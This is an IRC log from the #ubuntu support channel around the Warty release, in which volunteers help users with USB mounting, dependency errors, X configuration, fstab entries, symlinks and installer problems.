elviroloDpend: libqt3c102-mt (>= 3:3.3.3) mais ne sera pas install04:50
yostvn , ok it shows now04:50
rebirthstvn, no it doesnt04:50
mirak_-what is "kate" for?......its a kde thing isnt it?04:50
stvnyo: huh? normally it shows the free space on the disk you are currently working on04:50
stvnyo: oh ok04:50
elviroloRiddell, wait, let me post it in #flood04:50
rebirthstvn, i have removeable storage set to be auto mounted04:50
rebirthstvn, it also appears in device manager04:50
Riddellmirak_-: KDE Advanced Text Editor04:51
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mirak_-riddell, thnx :)04:51
Riddellmirak_-: like gedit, but good04:51
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rebirthstvn, any ideas? :X04:52
stvnrebirth: hm odd, it should automount than, not much of an USB-star myself, so can't really help you, could give the command to mount it manually though04:52
mirak_-riddell, I never used it.......but what makes a "text editor" good.......its just text?04:52
phillwow. totem-xine >>>>>>>>> totem-gstreamer04:52
rebirthstvn, yeah thatd be cool, thanks04:52
bwlangmirak_-: quality is in how easy an editor makes it to manipulate text...04:52
stvnrebirth: check on which device the usb stick is attached04:53
Riddellmirak_-: well I'm just annoyed with gedit because I couldn't save files to FTP, being a KDE user I expect things like that as standard04:53
rebirthstvn, how do you mean? i can give you the bus number of output of lsusb04:53
stvnRiddell: it is possible if you coonect to the ftp server with nautilus04:53
stvnrebirth: check dmesg04:54
mirak_-riddell, kk i see.....i don't use kde.....nor do I edit many text files, but when I do...i guess gedit works.......but I deff see your point04:54
stvnRiddell: you can conenct to a number of different servers with nautilus and than any gnome app can save to it04:54
rebirthi have removeable storage set to be auto mounted04:54
rebirtheth0: no IPv6 routers present04:54
rebirthdrivers/usb/input/hid-input.c: event field not found04:54
rebirthoh, stvn04:55
rebirthusb 2-2: new full speed USB device using address 504:55
rebirthscsi1 : SCSI emulation for USB Mass Storage devices04:55
rebirth  Vendor: CREATIVE  Model:  RHOMBA           Rev:04:55
rebirth  Type:   Direct-Access                      ANSI SCSI revision: 0204:55
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stvnrebirth: the only thing that is important is the /dev/s*** device it is attached to04:56
elviroloRidell: i tried installing other packages and it's the same prob :(04:56
yoa question04:56
rebirth /dev/scsi/host1/bus0/target0/lun0: p104:56
yohow to get a .deb package from source ?04:56
Riddellelvirolo: try sudo apt-get install kdelibs404:57
stvnrebirth: sure there is no /dev/sda-like device listed?04:57
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erikhey, so ..  Package nvidia-glx is not available, but is referred to by another package.04:57
erikhow do I fix that?04:58
stvnerik: add the universe repository04:58
erikstvn: how do I do that?04:58
britt_hey how do i install naim04:58
britt_using apt-get04:58
elviroloRiddell, ok, it's in #flood04:58
rebirthstvn, nope, its being simulated as a scsi device04:58
mirak_-britt_, sudo apt-get install naim       but gaim comes pre-installed04:59
stvnerik: in synaptic: settings>>repositories04:59
britt_i like txt based things though04:59
erikstvn: thanks04:59
yohow to get a .deb package from source file ?04:59
mirak_-britt_, kk then......04:59
stvnrebirth: hm normally it also appears as a scsi harddisc, eg /dev/sda04:59
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britt_actually how to i get ubuntu to start up in text mode04:59
elviroloRiddel, why are there all these dependecy probs?05:00
rebirthstvn, odd :x05:00
Riddellelvirolo: ok, starting to make sense, what happens if you do  sudo apt-get install libqt3c102-mt05:00
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=== linux_mafia wishes he could meet one fellow beagle user
elviroloRiddell, done ...05:01
=== mirak_- [~onceagain@adsl-68-249-245-156.dsl.sfldmi.ameritech.net] has joined #ubuntu
stvnrebirth: try the forums/mailing list, or google, i'm a bit tired and can't think clearly ATM, sorry05:01
britt_how do i get ubuntu to boot up in text mode instead of giving me the GUI05:02
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rebirthstvn, no problem, you've been a big help :_)05:02
yoanyone knows how to create a .deb package?05:02
mirak_-britt_, at the log in screen...go to session05:02
LinuxJonesbritt_,  update-rc.d -f gdm remove05:02
Riddellelvirolo: right, looks like Qt needs hoary, you can either s/warty/hoary/ in sources.list or recompile Qt yourself05:02
britt_hope that works05:03
mirak_-britt_, if you do what linux jones says....im pretty sure the gui will be gone totaly05:03
elviroloRiddel: ok ...05:03
elviroloRiddell, i'll try hoary then :)05:03
LinuxJonesbritt_,  it will :)05:03
britt_i want to be able to use it if i need it05:03
britt_via startx05:03
elviroloRiddell, thank you so much for your help :)05:03
rebirthstvn, aha :x05:04
rebirthBuffer I/O error on device sda, logical block 105:04
rebirthAttached scsi removable disk sda at scsi0, channel 0, id 0, lun 005:04
rebirthSCSI device sda: 508668 512-byte hdwr sectors (260 MB)05:04
Riddellelvirolo: ok, tell me how you get on05:04
yono one knows ?05:04
Se7hdoes anyone knows where to remove "mounted partitions" from the desktop on the configuration aditor?05:04
stvnrebirth: ah ok, try sudo mount -t vfat /dev/sda /mnt05:04
rebirthstvn, kk, will that mount it to /mnt yea?05:05
britt_is that possible05:05
stvnrebirth: or instead of /mnt any dir you want05:05
stvnrebirth: yep05:05
rebirthstvn, thanks very much, /me tries it05:05
rebirthroot@rebirth:/media # mount -t vfat /dev/sda /media/rhomba/05:06
rebirthmount: wrong fs type, bad option, bad superblock on /dev/sda,05:06
rebirth       or too many mounted file systems05:06
erikhow does one change the maximum display resolution?05:06
britt_hey if i dont specify a root password, and i need to do su05:06
britt_what is the password i type05:06
stvnrebirth: right er apparently it's not regular fat3205:07
stvnrebirth: you could try mount -t auto05:07
rebirthstvn, according to device manager its vfat05:07
LinuxJonesbritt, Ubuntu uses sudo so you would use your password05:07
rebirthstvn, kk, sec05:07
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rebirthstvn, where do i put the auto?05:08
britt_thanks guys05:08
britt_so if i do the update-rc.d -f gdm remove05:08
britt_it will dump me to txt login05:08
stvnrebirth: oh, try mount -t vfat /dev/sda1 /media/rhomba05:08
britt_and than I could start X win if i needed to05:09
britt_for kicks and giggles05:09
rebirthstvn, no errors there05:09
rebirthand it pops up05:09
rebirthi love you stvn, thank you so much05:09
stvnrebirth: I forgot the 1 ;)05:09
rebirthany idea how to set it to auto mount?05:09
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stvnrebirth: you can add the following line to your /etc/fstab for future use: /dev/sda1 /media/rhomba vfat noauto,user,defaults 0 005:10
one_forcewww.adictosalweb.com recursos gratis en la web05:10
stvnrebirth: that'll make it a bit easier next time, don't know about automount05:10
rebirthstvn, cool thanks :)05:10
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rebirthi have hotplug set to mount from fstab i think anyway05:10
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=== BrianB04 [~bbommarit@pcp08392398pcs.newhav01.mi.comcast.net] has joined #ubuntu
BrianB04Morning all05:11
britt_alrigth well i wil try that and get back on if it doesnt work05:11
britt_i'm at work rigth now05:11
britt_I will try later05:11
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mdzbob2: we sent out an announcement for hoary05:14
danielsmdz: fwiw, as you can see, all my merge bugs except php4 are complete05:14
BrianB04What's going on with hoary btw?05:14
mdzdaniels: thanks05:14
danielsmdz: you're welcome05:14
=== daniels heads back to the hotel; not only do I not have nstx, but I don't have fooishbar at all. :P
mdzdaniels: ?05:15
daniels(there's an ethernet port there, but you need to pay, but you can, of course, get DNS)05:15
danielsmdz: i was trying to put 2.6.x on fooishbar so I could get a proper tun module to get nstx working (i.e. internet from the hotel), but in the process I killed fooish altogether05:15
danielsso I have even less access than I started with ;)05:15
danielsho hum05:15
danielshopefully the cs.pdx guys have started it back up by the time I get there05:16
danielsanyway, -> hotel, dinner, walking around05:16
Mithrandirdaniels: do you have open outgoing DNS ?05:16
danielsMithrandir: yes05:16
danielsMithrandir: hence the desire for nstx05:16
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Mithrandirdaniels: if you can talk to whatever dns server you want, you can use my nstx, but I haven't gotten it working with a third-party dns server.05:16
danielsi'm not sure whether or not I can05:17
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Mithrandirtry, I just /msg-ed you the details.05:17
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danielsbut one way you can do it is to make nstx listen on port 5353, and then have bind9 (or whatever) forward nstx.whatever to localhost:535305:17
danielsthat's what I did for fooish05:17
Mithrandiryeah, but I can't get bind to DTRT05:17
danielsit worked alright for me -- anyway, I'll see05:18
danielsseeya, thanks :)05:18
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ThreeDayMonkI'd like to mount a disk image in loopbacl mode, but I don't have any /dev/loop devices05:21
ThreeDayMonkhow do I get one?05:22
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mdzdaniels: your track record of changing kernels while on the road is not very good05:23
mjr_ThreeDayMonk, try sudo modprobe loop05:23
mjr_the loop driver should then load and /dev should be appropriately populated05:24
erikhey, is there a graphical XF86Config-4 editor with ubuntu?05:24
ThreeDayMonkmjr_: thanks, that was it05:24
Mithrandirmdz: changing kernels on the road is seldom wise. :)05:24
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deFryskerik, dpkg-reconfigure xserver-xfree8605:26
deFryskerik, sudo dpkg-reconfigure xserver-xfree86 , sorry05:27
erikdeFrysk: I've changed my XF86Config-4 file manually and now the nvidia-glx-config refuses to touch it.  Do you have a copy of an unaltered one?05:29
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Mithrandirerik: there are some comments at the top on how to make nvidia-glx-config want to touch it again.05:30
erikMithrandir: I kinda totally replaced it05:31
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agwibowojust wondering05:31
Mithrandir#   cp /etc/X11/XF86Config-4 /etc/X11/XF86Config-4.custom05:31
Mithrandir#   md5sum /etc/X11/XF86Config-4 > /var/lib/xfree86/XF86Config-4.md5sum05:31
Mithrandir#   dpkg-reconfigure xserver-xfree8605:31
agwibowois it possible to....05:31
Mithrandirerik: run those commands.05:32
agwibowoto have my desktop spread across 2 monitors ?05:32
erikMithrandir: thanks05:32
ThreeDayMonkagwibowo: I have it across three05:32
agwibowoi.e. one linux computer, but across 2 monitors (for larger workspace)05:32
agwibowohow how how05:32
agwibowotell me05:32
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ThreeDayMonkagwibowo: what is your setup?05:32
agwibowoas in?05:32
agwibowoi'm running gnome 2.805:32
agwibowousing my laptop05:32
ThreeDayMonkgraphics hardware05:33
CplFullerUSMCBUSH wins05:33
ThreeDayMonkCplFullerUSMC: sad but true05:33
agwibowoneomagic 25605:33
ThreeDayMonkum... I'm not familiar with that05:33
ThreeDayMonkagwibowo: does it support dual-head?05:34
agwiboworight now, i can switch between my monitor  & my laptop monitor... but they essentially display the same desktop05:34
agwibowoerrr.. i don't think so....05:34
agwibowoit's an old laptop...05:34
ThreeDayMonksounds like you might not be able to05:34
agwibowobut could you tell me how did you do it with yours?05:35
ThreeDayMonksure - have a look at my XF86Config-4 file:05:35
agwibowomy desktop has nvidia mx 2...05:35
|progenic|anybody ? can i use gcc to compile assembly code ?05:36
agwibowogasm i think05:36
|progenic|gasm ?05:36
agwibowoi heard it before05:36
agwibowocan't remember05:36
|progenic|so the way i write the program is it same as masm ?05:36
agwibowonot sure05:37
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agwibowothis is so cool05:37
agwibowohow did you connect the monitors?05:37
agwibowois it just one video card?05:37
ThreeDayMonkagwibowo: two05:37
ThreeDayMonkone pci ati card driving the left monitor, and a dual-head nvidia for the middle and right05:38
agwibowoone of them has 2 monitor port?05:38
agwibowocan't wait to see it05:38
agwibowostill loading05:38
agwibowohouw lala....05:38
agwibowothis is like a dream05:38
ThreeDayMonkit's nice to work with05:39
ThreeDayMonkopengl only works on the main screen, so no cool matrix screensaver :-(05:39
agwibowoi wish i can have that05:39
agwibowohappy coding session05:40
agwibowoanyway.. thx for the files..05:40
agwibowoi'm off now.05:40
agwibowogoing to see my dream computer05:40
ThreeDayMonkok - it should explain it, I think05:40
ThreeDayMonkscreen, device, monitor for each head, and set up the layout05:41
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aTypicalThreeDayMonk, nice setup. :-)05:41
ThreeDayMonkaTypical: huge productivity enhancement05:42
aTypicalI wonder if my boss would buy that?05:43
ThreeDayMonkI fixed the fonts, too, so Japanese and Korean show nicely as well05:43
=== ThreeDayMonk must write some wiki entries
aTypicalThreeDayMonk, is that Ubuntu?05:45
aTypicalI mean your screenshot.05:45
aTypicalAre you using a different theme or is it just a background?05:45
ThreeDayMonkjust a background off kde-look.org, IIRC05:46
ThreeDayMonkI have a different theme now, with a nice customisation of Sloth for metacity05:48
ThreeDayMonkand the xmatrix screensaver is obligatory with such a setup :-)05:49
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MeAndUIs it possible to mount a folder in /dev/hda6 and not the whole partition ? Hwo05:50
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MFenhah, didn't know this was here05:51
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MFenis there a gui tool to set up your wireless card without knowing the ESSID? (similar to how xp does it)05:51
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MFeni assume ubuntu has a tool somewhere to do this, because it detects it during the install. but if you have to add a wlan later, it doesn't detect it05:53
spivI think all the install does is use an essid of "any".05:54
eriksudo md5sum /etc/X11/XF86Config-4 > /var/lib/xfree86/XF86Config-4.md5sum05:54
erikbash: /var/lib/xfree86/XF86Config-4.md5sum: Permission denied05:54
erikhow do I fix that?05:54
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MFenspiv: does that mean you can type in a literal string 'any' in the network util and have it work?05:54
ThreeDayMonkerik: sudo su, run the command, then exit05:54
spivMFen: Probably.05:55
erikThreeDayMonk: weird, ok05:55
spivThreeDayMonk: I typically use sudo -s to get a root prompt.05:55
MFengood to know05:55
deFryskmd5sum /etc/X11/XF86Config-4 > /var/lib/xfree86/XF86Config-405:55
=== sid77 bye!
ThreeDayMonkspiv: same number of characters :-)05:55
dubwavhow can I change default sound card?05:56
deFryskforget what I pasted05:56
erikis there a graphical XF86Config-4 editor?  I need to change the max resolution05:56
spiverik: It's because the redirection (the ">") done by the shell, which is running as you.  Running md5sum as sudo dosn't help that :)05:56
deFryskerik, sudo dpkg-reconfigure xserver-xfree86 , sorry05:56
deFryskwithout the sorry05:56
spiverik: http://www.ubuntulinux.org/wiki/XautoconfigurationDebug05:57
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erikspiv: yeah, I saw that heh thanks05:59
spiverik: Ok :)06:00
udHi, How do I go about apt-getting fluxbox_0.9.9-1 as I only seem to be able to get the 0.1.14 version?06:00
spiverik: I realise it doesn't help your problem directly, but it should help it be better in future :)06:00
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linux_mafiaanyone using beagle?06:01
darkersatanicIt crashed on Mars, didn't it?06:01
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linux_mafiai cant be the only ubuntu user, using it, someone wrote a wiki page goddamnit ;)06:04
linux_mafiabit late for that Ruffian, heh06:05
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RobotSadnessHi, I just installed Ubuntu and I'm in need of a C/C++ IDE, since I can't install KDevelop or Anjuta. Does anyone have any suggestions?06:08
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RiddellRobotSadness: emacs.  but why can't you install KDevelop?06:09
rcaskey_has everyone seen that?06:09
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RobotSadnessit doesn't show up in synaptic and I get a ton of dependence errors through apt06:09
mirakmirak_ mirak_- impostors06:09
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RobotSadnessI would prefer an IDE with tabs, as the project that I am working on is quite large, and I'd rather not have 4000 emacs windows open06:10
linux_mafiarcaskey_, what about it?06:10
RobotSadnessthanks, I will take a look at xemacs06:10
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rcaskey_linux: I thought it was humerous06:11
linux_mafiarcaskey_, yeah its funny, sorry for a moment i doubted your faculties, thought you might have thought it was real :)06:12
linux_mafiarcaskey_, like this : http://www.adequacy.org/public/stories/2001.12.2.42056.2147.html can't believe how many thought it was serious06:13
bdaleno netperf, even in universe?06:15
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ElVirolohi again06:16
linux_mafiahey guys06:17
linux_mafiaor girls as the case may be06:17
linux_mafiabdale, apparently not, nor in multiverse06:18
ElViroloRiddell: i've upgraded to hoary and i still get the same prob06:18
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ElViroloRiddell : wiat06:19
ElViroloRiddell: no I don't, sry06:19
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erikdoes ubuntu have some kind of firewall by default that would prevent openssh-server from working?06:19
lamonterik: openssh-server isn't installed by default, though06:20
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eriklamont: yeah06:20
erikwell see, I'm trying to set up someone's ubuntu install over the phone06:20
erikand I've never used ubuntu06:20
lamontah, yes.06:20
erikhe's installed openssh-server SO HE CLAIMS06:20
erikbut is unable to ssh localhost06:20
erikhowever sshd shows up in ps wax06:21
Treenakserik: and netstat?06:21
erikTreenaks: I tried to get him to run that ... difficult06:21
Treenakserik: netstat -na | grep 2206:21
erikyeah he's not too big on the pipe symbol :/06:21
lamonterik: nc is installed by default :-)06:22
GerrathI've been using Ubuntu for the last week and I'm very impressed with it, Kudos to the developers!06:23
eriklamont:  Really? .. Score!06:23
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bdalelamont: netperf likely as an eventual addition?06:23
bdalelamont: not by default, but at least available...06:23
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tylerwyliewoohoo bush won06:23
lamontbdale: that could certainly go to multiverse today, and with a small license change, could go into at least universe, if not supported.06:24
Dragoanyone set vmware up on ubuntu yet?06:24
lamontdepending on how scary it is, of course.06:24
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bdalelamont: have I poked you sufficiently, or do I need to note it somewhere else?06:24
Dragoi'm having some problems that it won't let me compile the modules.06:24
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erikok he's got openssh-server now but his firewall isn't allowing incoming connections06:25
eriktime to set up a tunnel :/06:25
lamonterik: or say /usr/sbin/sshd -p ....06:27
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eriklamont: seems to be all ports06:27
lamontassuming that he has _any_ inbound ports...06:27
erikcould use one over 32k i guess06:27
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erikssh -L8000:localhost:22 destination06:28
kensaiis it safe to upgrade to the new version of ubuntu-desktop in hoary? I see apt always skip it when I do dist-upgrade06:28
erikthat should let me log onto destination and ssh -p 8000 localhost, no?06:28
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billytwowillyIn kde, I can add a quick browser button to the task bar and it gives me a drop down menu of whatever part of the file system I point it to. Is there something like this for gnome?06:29
deFryskkensai, leave the ubuntu-desktop for now06:29
deFryskits just a meta-package06:29
kensaiany special reason?06:30
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deFryskkensai, broken deps probably06:30
deFryskkensai, I have it the same06:30
kensaiI just have one prob with hoary06:30
deFryskfun to get gnome2.9 packages though :)06:30
kensaiat boot it is searching for ext3 but I have reiserfs so after not finding ext3 the it starts to boot normally06:31
deFryskkensai, ext3 is default for ubuntu , thats why , I have that too :)06:31
CredI have two sound cards (AC'97 and SB LiVE) by default Ubuntu is using AC and this doesn't work, how can I change to SB?06:32
Dragoso I take it noone tried getting VMware to work yet... damn.06:32
deFryskCred, ac is build in in your motherboard ?06:32
deFryskthen turn it off in the bios06:33
deFryskthen it should work fine06:33
=== deFrysk has it also turned off in the bios to make his other soundcard work
CredI don't want to use workarounds, there must be an way to just change the primary sound card.06:34
CredBut that's problaby what I'll do, I don't use it anyhow :)06:34
CredUseless piece of.. ;)06:34
monkeysmurfDrago -- I've gotten it to work fine in vitualpc2k4, but no sound only.06:34
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CredI was wondering if it could be changed from some tool or something like that. alsaconf maybe..06:35
Dragomonkeysmurf, how It wont let me compile any of the kernel modules.06:35
Dragooh wait you're running the windows version.06:36
monkeysmurf?? I must've missed the beginning of your conversation then anyway.  yah, virtualpc is a microsoft product06:36
Dragonot virtual PC06:36
monkeysmurfyah, haven't tried it06:37
Dragovmware will let me boot a partition off my hdd instead of using a image.06:37
kensaideFrysk: so it is just a problem with some package?06:38
erikso I had him ssh into me06:38
erikI think he's connected via ipv6?06:38
erikthat's what netstat shows06:38
deFryskkensai, hoary is a version in development , meaning some packages are broken or not there , so there will always be some dependency probs06:39
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kensaiso the ext3 prob can be fixed later on?06:40
Dragookay vmware isnt that important. I haven't tried it yet but I'll ask. Do I need to set up anything special to burn CD/DVDs with ubuntu or is that setup already06:40
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deFrysk*always often06:40
Dragoand if I do what do I need to set up?06:40
kartoDrago, it worked for me with default 4.10 install06:40
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DragoI can't seem to find a CD burning app installed at all.06:41
kartoif you have an iso, just rightclick it and choose "burn to disc"06:41
deFryskkensai, the ext3 comment not a bug06:41
Dragowell I wanted to burn Music and video dvds.06:42
CredAbout flash. I know there's plenty of information on the forums but I fail to find package flashplayer-mozilla with synaptic06:42
Dragowhich don't come in isos06:42
kartoif you want to burn files, choose "places>cd creator" (in a gnome window)06:42
monkeysmurfhas anyone been able to run nessus-update-plugins successfully in ubuntu?06:42
erikis there an ubuntu way to install the intel/broadcom wireless drivers?06:42
CredShould flashplayer-mozilla package be in universe?06:43
kartojust add the files to the window, choose "file>write to disc"06:43
deFryskCred, yes06:43
deFryskits calles flashplugin-nonfree06:43
CredSo it's the same?06:43
CredSame package with different name?06:43
Dragoahh cool thanks.06:43
DragoI'm not used to gnome.06:44
billytwowillywhat do I change in gconf-editor to get a different icon for directories than for files? Theya ll have this paper like icon now06:44
kartome neither... had to learn that one the hard way :06:44
deFryskgnome rules06:44
CredSo it does ;)06:44
CredI did have to make one change as I didn't like double click to open idea :)06:45
kartois there any way to make backspace the back key in firefox?06:45
deFryskxfce4.2 rules too btw06:45
Dragoalso I seem not to be able to get bittorrent working. it needs libgtk2.3 or greater but says that only 2.2 or under is installed. I don't see 2.3 in the package manager.06:46
Disharmonyhey can anybody provide some llinks to debian ustable mirrors?06:46
billytwowillyAlso, how do I turn off the lame "This file has X extension but is Y please change extension or use openwith to select application"?06:46
CredFluxbox would be my choice.. I liked it.06:46
deFryskDrago, apt-get install bittorrent-gui06:46
kensaideFrysk: so how do I fix it not searching for ext3 ?06:46
erikDisharmony: deb http://debian.lcs.mit.edu/debian unstable main contrib non-free06:46
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deFryskkensai, dont know to be honest06:46
Disharmonythanks erik06:46
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eriknp Disharmony06:47
CredThanks deFrysk06:47
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deFryskor apt-get install bittornado-gui06:47
deFryskbittornado rules06:47
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bluefoxicythe Ubuntu install i386 warty CD, in custom mode, can't seem to read my partition table06:48
bluefoxicyfdisk and the partitioner do it06:48
bluefoxicybut the kernel isn't seeing any partitions06:48
IsbitenIm having problem with my keyboard and ubuntu, Im using one of those old mini keyboard that came with the old imacs06:48
=== Mirno George W. Bush rlu prsident des Etats-Unis yy c cooooooooooooooooooooooool
bluefoxicyI can't find the pcbios partition module?06:48
IsbitenI can't do 'at' signs etc06:48
TreenaksMirno: please take it to #politics06:49
cardadorMirno: nothing to be happy about, i think :\06:49
deFryskTreenaks, #amateurs you mean ?06:49
bluefoxicyAnyone know about the installer being difficult/broken?06:50
TreenaksdeFrysk: no, #politics06:50
billytwowillydoes gnome have something like kprinter?06:51
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MirnoTreenaks,  sorry, was a broadcast should have left the channel before broadcasting it, I apologize.06:51
kartowoooot... firefox 1.0RC1 has backspace for back!!!!06:51
Dragoadding normal debian mirrors into my sources list wont mess up ubuntu will it?06:51
bluefoxicyit's saying drievers like ide-mod etc are not available06:52
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balubaDrago, the universe is not enough?06:53
cyrus-tcis there a modul for 3w-xxxx loadable after booting from cd? i can't try - not at home06:53
balubaciao merlin006:53
spivDrago: http://www.ubuntulinux.org/support/documentation/faq/helpcenterfaq.2004-09-15.745390439406:53
merlin0ciao baluba06:53
=== |Gaaruto|2 [~|Gaaruto|@ASte-Genev-Bois-151-1-30-58.w83-114.abo.wanadoo.fr] has joined #ubuntu
MeAndUI wont to mount a folder is it possible06:54
cardadorMeAndU: explain yourself better06:55
cardadorMeAndU: what exactly you want to mount?06:55
merlin0folder is a directory?06:55
kartois there a way to add the "click middle mouse scroll" to firefox?06:55
kartosame as in windows06:56
bluefoxicyso is Ubuntu terminally broken?06:56
balubakarto, is not there?06:56
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MeAndUcardador, I wont to mount  single folder which has my media sound and video in my /home. I currently access it by mounting the hole partition a fat32 part06:57
bluefoxicyconsidering the installer refuses to find my partitions when I managed to somehow install sarge and gentoo, and fdisk lists partitions, and the ubuntu partitioner lists them06:57
deFryskkarto,  yes06:57
kartobaluba, like tis http://www.linuxquestions.org/questions/history/23886006:57
bluefoxicyit's as if my kernel has no code in it for reading the partition table06:57
deFryskin options preferences06:57
deFryskedit > preferences06:58
Treenaksbluefoxicy: it does, don't worry06:58
bluefoxicyTreenaks:  Well it can't seem to find my partitions06:58
cardadorMeAndU: you should edit /etc/fstab and add: /dev/hda? /home/meandu/media&sound auto auto,users,exec       0       006:58
bluefoxicythe installer won't format hda8 because the kernel can't find the device06:58
Treenaksbluefoxicy: then there's a problem somewhere else06:58
karto:D ... thx deFrysk06:58
deFryskkarto, set it in advanced to autoscrolling06:58
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kartoive been looking in all the wrong places - missed the obvious06:59
cardadorMeAndU: where i write hda? you should put the number of your partitin06:59
bluefoxicyTreenaks:  The problem is that it has ide-disc loaded, it sees a /dev/ide/host0/bus0/target0/lun0/disc, but no partitions06:59
MeAndUcardador, can i test that command line before i add it06:59
kartodamn i've been missing that feature ... my fingers are lazy06:59
merlin0MeAndU: is not possible (in my knowledge)06:59
cardadorMeAndU: yes06:59
deFryskkarto, never say "like in windows" again , or you might crash , like in windows06:59
bluefoxicyTreenaks:  I can make devices to access those partitions, but the kernel says no such device.06:59
erikhow do you get the "Applications/system" menu back if it is deleted?06:59
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cardadorMeAndU: mount /dev/hda???? /home/meandu/media&sound??07:00
bluefoxicyTreenaks:  now where else do you suppose the problem is?07:00
deFryskerik rightclick the panel07:00
balubakarto, check this preference and change it to 'true'07:00
balubakarto, general.autoScroll07:00
deFryskerik, and add do blah and select07:00
merlin0cardador: he want mount only a folder of his windows partition07:00
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MeAndUcardador, No that will mount the whole partition, what i want is a single folder from that partition07:01
kartosometimes i boot to winXP just to see how long it takes before it locks up on me... maybe i should write a program to do those random lockups for ubuntu?07:01
kartothx baluba - got it already ;)07:01
balubakarto, ok07:01
cardadorMeAndU: ahh, dont know if it is possible. sorry i didnt understand07:01
MeAndUmerlin0, What if i mount the partition somewhere and then mount the folder from that location07:02
merlin0MeAndU: reserve a windows partition for that data, then mount it07:02
bluefoxicythis is terminally broken  >/07:02
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darkpinesMeAndU, Or mount the partition in /mnt and then make a symbolic link in home for your folder.07:02
merlin0MeAndU: you can mount a device ( a partition)07:02
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MeAndUmerlin0, Sure I can do that but mounting a folder is not possible07:03
merlin0yes, darkpines is elegant solution07:03
merlin0use symbolic links07:04
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MeAndUif the folder is /mnt/hdd6/media what will be the link command to /home/meandu07:04
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deFryskln -s blah07:04
bluefoxicyI can't fix this, the modules that i need just aren't there, or i don't know what they are; in either case, the installer sure as hell can't find any modules related to actually letting the kernel understand what's on my disk07:05
darkpinesMeandU, ln -s /mnt/hdd6/media /home/meandu/nameyougivethefolder07:06
cardadorbluefoxicy: have you checked your iso md5?07:07
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bluefoxicycardador: i'll do that07:07
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bluefoxicythis may take a while07:08
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MeAndUdarkpines, I got this error hard link not allowed for directory07:08
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bluefoxicya491903a2d2197651864dec3836d85e0  /data/cd_images/warty-release-install-i386.iso07:09
bluefoxicya491903a2d2197651864dec3836d85e0  warty-release-install-i386.iso07:09
billytwowillynautilus is driving me nuts. How do I turn off the stupid protection to stop me from opening files with the wrong extension?07:09
bluefoxicycardador:  looks right.07:09
darkpinesMeAndU, you probably have to mount the partition with permissions for your user07:09
bluefoxicycardador:  is expert mode broken?07:10
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MeAndUdarkpines, Can i do it from command line ( only root can mount )07:10
cardadorbluefoxicy: dont know,  i have used without an hitch07:11
darkpinesMeAndU, Add to your /etc/fstab so it automounts with user permissions.  Is this a vfat partition?07:11
cardador*have used it07:11
bluefoxicycardador:  willing to step through with me?07:12
MeAndUdarkpines, Yes its a fat32 part, but i want to test before i add to fstab07:12
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MeAndUdarkpines, fstab needs a reboot right !07:13
cardadorbluefoxicy: i am not a linux expert, just an enthusiast :)07:13
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bluefoxicydoes anyone here want to walk through an install with me?07:14
bluefoxicyit's like 5 steps before it breaks07:14
cardadorbluefoxicy: you can try me, and maybe one of ubuntu guru might help07:14
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=== bluefoxicy reboots the install CD
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bluefoxicyboot:  expert acpi=off07:14
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darkpinesMeAndU, no reboot necessary, after you edit fstab, type mount -a and it will go through the routine.07:15
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bluefoxicychoose language:  English; choose location:  United States; select a keyboard layout:  PC style, American English07:15
bluefoxicyDetect and mount CD-ROM07:15
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bluefoxicybunch of modules, continue, don't prompt for module parameters07:16
bluefoxicystart PC card services07:16
bluefoxicyUnable to load some modules:  natsemi, ide-mod, ide-probe-mod, ide-detect, ide-floppy07:16
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bluefoxicyTune CD-rom:  -X69 -u1 -d1; found warty warthog 4.1007:17
nesman89windows network question07:17
bluefoxicyload installer components (selected none).  DEtect network hardware (natsemi), unavailable drivers:  Ide-mod, ide-probe-mod, ide-detect, ide-floppy07:17
altanby the way, it appears that there is a problem with location settings, when I had location set to Turkey when I installed Ubuntu I got a bunch of warnings when starting XWindows programs from the command line about C headers do not support locale or something that would repeat as long as the program was open07:18
altanI stopped this from happening by switching my location to the US07:18
bluefoxicystatic config on the network07:18
cardadorbluefoxicy: whats your computer arquit.? 386 amd, etc07:18
nesman89i browse to windows network and get an access denied wrong permissions.  any ideas07:18
bluefoxicydetect hardware.  Unavailable modules:  ide-mod, ide-probe-mod, ide-detect, ide-floppy07:18
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bluefoxicycardador: Compaq Presario 2100 with DEbian Sarge, ReactOS, and Gentoo LInux on it.  AMD Athlon XP barton core.07:19
bluefoxicypartition disks.07:19
cardadorbluefoxicy: which iso you have?07:19
bluefoxicyit shows #1 #5 #6 #7 #8 #9 in the partitioner (Ide1 master hda 60.0GB IC25N060ATMR04-0)07:20
Disharmonyis there any gui tool to mount partitions in ubuntu?07:20
bluefoxicycardador:  http://releases.ubuntu.com/warty/warty-release-install-i386.iso07:20
MeAndUdarkpines, I added mount to fstab with auto auto,users,exec 0 0 but still got the hard link not allowed for directory07:21
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bluefoxicyfinish partitioning, format hda807:21
cardadorbluefoxicy: ok. dont have a clue whats your problem. maybe you can ask it on ubuntu user list07:21
bluefoxicyCannot create filesystem on partition 8 of IDE1 Master (hda)07:21
cyrus-tcmay _anybody_ take a look into the intitial kernel configuration if there is a modul for 3w-xxxx? thank you07:21
nesman89any thoughts on connecting to windows network?07:22
=== bluefoxicy switches to the console and creates (mknod hda8 b 3 8) an hda8 device in /root
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bluefoxicycat: hda8: No such device or address07:22
MeAndUdarkpines, I still dont have user access to the mounted partition07:22
cardadornesman89: computer > syst conf > networking > general > windows networking07:22
cardadornesman89: you should install samba though07:23
darkpinesMeAndU Did you try mount -a after you edited fstab?07:23
MeAndUdarkpines, yes07:23
helkanaurHmm.. my XMMS is playing the songs _really_ fast, 3 sec on a song thats 4 min. oO  And no sound..07:23
helkanaurSomeone told me to change 'output-plugin' .. (?)07:23
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nesman89i can connect using the connect to computer option than putting in the computer name.  i was just wondering  there was an issue browsing to the share.07:23
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MeAndUdarkpines, It did mount i can see the files but no access as user07:24
raphaHi all!07:24
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=== bluefoxicy tries normal install mode
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darkpinesMeAndU In my fstab, I just use umask=0, and it works07:25
MeAndUdarkpines, ok i will try that07:26
MeAndUdarkpines, where does it fit any where in the line07:27
bluefoxicythe regular guided install can't do it either.07:27
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=== ..[topic/#ubuntu:jind] : Hey, set +t ;)
=== ..[topic/#ubuntu:jind] : http://www.ubuntulinux.org/support/documentation/faq/ || Wiki: http://wiki.ubuntu.com/ || Lists: http://lists.ubuntu.com/ || Bugs: http://bugzilla.ubuntu.com/ || warty is out, no X.org, please wait || Please don't paste in the channel, use http://www.pastebin.com/ || CDs will ship in a few weeks
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cardadorbluefoxicy: thats weird, because you dont have problems with plain debian07:29
MeAndUdarkpines, I now have access to the mounted folder as user but still got the hard link not allowed for directory07:29
jindHey, no ops?07:29
